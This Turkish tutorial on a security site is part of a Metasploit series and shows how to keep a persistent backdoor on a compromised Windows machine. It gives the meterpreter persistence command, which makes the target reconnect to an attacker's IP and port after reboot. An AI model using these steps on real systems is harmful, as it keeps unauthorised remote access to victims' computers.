ÇözümPark'a hoş geldiniz. Oturum Aç | Üye Ol
 
Ana Sayfa Makale Video Forum Resimler Dosyalar Etkinlik Hizmetlerimiz Biz Kimiz

Güvenlik

Metasploit – Bölüm 2 – Backdoor

Bu makalde ele geçirilmiş bir windows işletim sistemine nasıl backdoor (Arka Kapı) yerleştirilir bu konu ele alacağız.

 

İlk olarak aşağıda örnek bir trojan oluşturulmuştur, belirtilen port dinlemeye alınarak hedef sistemden reverse bağlantı alınmıştır.

clip_image002

Şimdi ise , meterpreter satırındayken “backround” komutunu kullanarak gelen bağlantıyı arka plana alıyoruz “sessions” komutu ile “ID” numarasını öğreniyoruz. Şimdi ise tekrardan “sessions -i ” şeklinde bağlantı yapılır. Meterpreter satırındayken persistence script’ini çalıştıracagız “run persistence -U i 5 -p <dinleme yapılan port> -r <bağlantıyı karşılayacak ip adresi>” şeklinde çalıştırılır.

clip_image004

Evet gerekli aşamalar sıkıntız bir şekilde gerçekleşti, şimdi test etmek için hedef sistemi shutdown veya restart edelim.

clip_image006

Evet sessions komutu çalıştırdıgımız zaman görüldüğü gibi hiçbir oturum yok. Hedef sistem açıldıktan sonra “run” komutunu kullanarak sisteme tekrardan giriş sağlıyoruz.

clip_image008

Umarım faydalı bir makale olmuştur, bir sonraki makalemizde görüşmek üzere.

Tarih : 28 Mayıs 2017 Pazar 23:06 Yayınlayan: Gökhan YÜCELER

Yorumlar

 

Hakan UZUNER

Eline sağlık Gökhan

Mayıs 29, 2017 11:34
 

Yasin AKILLI

Eline sağlık Gökhancım, seninle buralar biraz secure oldu sanırım :)

Haziran 12, 2017 22:06
 

Zafer Babur

Çok güzel olmuş, eline sağlık...

Haziran 16, 2017 17:02
Kimliksiz yorumlar seçilemez kılınmış durumdadır.

Yazar: Gökhan YÜCELER

15.01.1986 yılında İstanbulda doğan Gökhan YÜCELER, 12 yıldır IT sektöründe değişik görevlerde çalışmış olup, son 8 yıldır bilişim güvenliği alanına yoğunlaşmış bulunmaktadır. Görev aldığı kuruluşlarda bilgi güvenliği uzmanı olarak yer almış olup, bu alanda bir çok projeye imza atmıştır. MayaSoft Bünyesinde, Information Security Specialist olarak kariyerine devam eden Gökhan YÜCELER, güvenlik sızma testleri, adli bilişim incelemeleri, IPS/IDS atlatma teknikleri, DDoS saldırıları tespit ve önleme yöntemleri ve Python Security Scripting üzerine çalışmalar yapmaktadır. Gökhan YÜCELER, MCP, CCNA, CCNP, SNAF, FCNSA, FCNSP, CEH, GPEN sertifikalarına sahiptir.
 

Bu Kategori

Hızlı aktarma

Etiketler